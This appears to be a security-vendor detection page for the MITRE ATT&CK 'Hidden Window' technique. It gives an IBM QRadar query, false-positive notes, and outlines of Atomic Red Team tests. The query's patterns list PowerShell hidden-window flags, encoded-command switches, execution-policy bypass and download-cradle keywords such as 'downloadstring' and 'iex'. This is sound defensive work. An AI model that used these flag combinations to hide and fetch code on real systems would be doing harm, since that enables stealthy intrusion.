T1564.003 IBM QRadar · QRadar

Detect Hidden Window in IBM QRadar

Adversaries may use hidden windows to conceal malicious activity from users. On Windows, this is achieved through PowerShell's -WindowStyle Hidden flag or by using the ShowWindow API with SW_HIDE. The CreateProcess API's STARTUPINFO structure also allows processes to be created without a visible window. On macOS, the LSUIElement or LSBackgroundOnly Info.plist keys make applications background-only. Malware families using hidden windows include Astaroth, QuietSieve, StrongPity, and LockBit 2.0.

MITRE ATT&CK

Tactic
Defense Evasion
Technique
T1564 Hide Artifacts
Sub-technique
T1564.003 Hidden Window
Canonical reference
https://attack.mitre.org/techniques/T1564/003/

QRadar Detection Query

IBM QRadar (QRadar)
sql 
SELECT
  DATEFORMAT(starttime, 'yyyy-MM-dd HH:mm:ss') AS event_time,
  sourceip,
  username,
  "Process Name" AS process_name,
  "Command" AS command_line,
  "Parent Process Name" AS parent_process,
  CASE WHEN LOWER("Command") LIKE '%-windowstyle hidden%'
            OR LOWER("Command") LIKE '%-w hidden%'
            OR LOWER("Command") LIKE '%-windowstyle h%'
            OR LOWER("Command") LIKE '%/hh%' THEN 1 ELSE 0 END AS ps_hidden,
  CASE WHEN LOWER("Command") LIKE '%-encodedcommand%'
            OR LOWER("Command") LIKE '%-enc %'
            OR LOWER("Command") LIKE '%-e %'
            OR LOWER("Command") LIKE '%-ec %' THEN 1 ELSE 0 END AS encoded_cmd,
  CASE WHEN LOWER("Command") LIKE '%net.webclient%'
            OR LOWER("Command") LIKE '%invoke-webrequest%'
            OR LOWER("Command") LIKE '%downloadstring%'
            OR LOWER("Command") LIKE '%iex%' THEN 1 ELSE 0 END AS download_cradle,
  CASE WHEN LOWER("Command") LIKE '%-executionpolicy bypass%'
            OR LOWER("Command") LIKE '%-ep bypass%' THEN 1 ELSE 0 END AS policy_bypass
FROM events
WHERE LOGSOURCETYPENAME(devicetype) IN ('Microsoft Windows Security Event Log', 'Sysmon')
  AND QIDNAME(qid) IN ('Process Create', 'A new process has been created')
  AND ("Process Name" ILIKE '%powershell.exe' OR "Process Name" ILIKE '%pwsh.exe'
       OR "Process Name" ILIKE '%cmd.exe' OR "Process Name" ILIKE '%wscript.exe'
       OR "Process Name" ILIKE '%cscript.exe')
  AND (
    LOWER("Command") LIKE '%-windowstyle hidden%'
    OR LOWER("Command") LIKE '%-w hidden%'
    OR LOWER("Command") LIKE '%-windowstyle h%'
    OR (LOWER("Command") LIKE '%/hh%' AND "Process Name" ILIKE '%cmd.exe')
    OR (LOWER("Command") LIKE '%-noninteractive%' AND LOWER("Command") LIKE '%-windowstyle%')
  )
  AND starttime > NOW() - 1 DAYS
ORDER BY starttime DESC
LAST 86400 SECONDS
high severity high confidence

Detects hidden window process creation using Windows Security Event Log and Sysmon sources. Flags PowerShell and cmd.exe processes with hidden window arguments, scoring additional risk indicators like encoded commands and download cradles.

Data Sources

Microsoft Windows Security Event Log (EventID 4688 with command line auditing)Sysmon EventID 1 via QRadar DSM

Required Tables

events

False Positives & Tuning

  • IT automation tools such as SCCM client actions or Group Policy scripts that silently execute PowerShell with hidden windows
  • Antivirus or EDR products performing background remediation tasks using hidden PowerShell sessions
  • DevOps pipeline agents (Jenkins, GitLab Runner, Azure DevOps) running build scripts non-interactively
Download portable Sigma rule (.yml)

Other platforms for T1564.003

Microsoft Sentinel (KQL) Splunk (SPL) Elastic Security (Elastic) Sumo Logic CSE (Sumo) Google Chronicle (YARA-L) CrowdStrike LogScale (LogScale) All platforms (combined) →

Testing Methodology

Validate this detection against 3 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1PowerShell Hidden Window Execution

    Expected signal: Sysmon Event ID 1: powershell.exe with -WindowStyle Hidden in command line. Sysmon Event ID 11: file created at Temp path. PowerShell ScriptBlock Log Event ID 4104 with the command content.

  2. Test 2Hidden Window with Encoded Command

    Expected signal: Sysmon Event ID 1: powershell.exe with both -WindowStyle Hidden and -EncodedCommand in command line. PowerShell ScriptBlock Log Event ID 4104 showing decoded content 'whoami'.

  3. Test 3Hidden Window with Execution Policy Bypass and Download Cradle

    Expected signal: Sysmon Event ID 1: powershell.exe with all three flags. Sysmon Event ID 3: network connection attempt to 127.0.0.1:8080. The download will fail (no server) but both process creation and network events fire.

Last updated: 2026-04-21 Research depth: deep
References (4)

Unlock Pro Content

Get the full detection package for T1564.003 including response playbook, investigation guide, and atomic red team tests.

Response PlaybookInvestigation GuideHunting QueriesAtomic Red Team TestsTuning Guidance
Sign Up for Pro View Pricing

Related Detections

Parent Technique

T1564Hide Artifacts

Related Sub-techniques

T1564.001Hidden Files and DirectoriesT1564.002Hidden UsersT1564.004NTFS File AttributesT1564.005Hidden File SystemT1564.006Run Virtual InstanceT1564.007VBA StompingT1564.008Email Hiding RulesT1564.009Resource ForkingT1564.010Process Argument SpoofingT1564.011Ignore Process InterruptsT1564.012File/Path ExclusionsT1564.013Bind MountsT1564.014Extended Attributes

Related Techniques

T1564Hide ArtifactsT1059.001PowerShellT1027.010Command ObfuscationT1053.005Scheduled TaskT1105Ingress Tool Transfer

Same Tactic: Defense Evasion

Popular Detections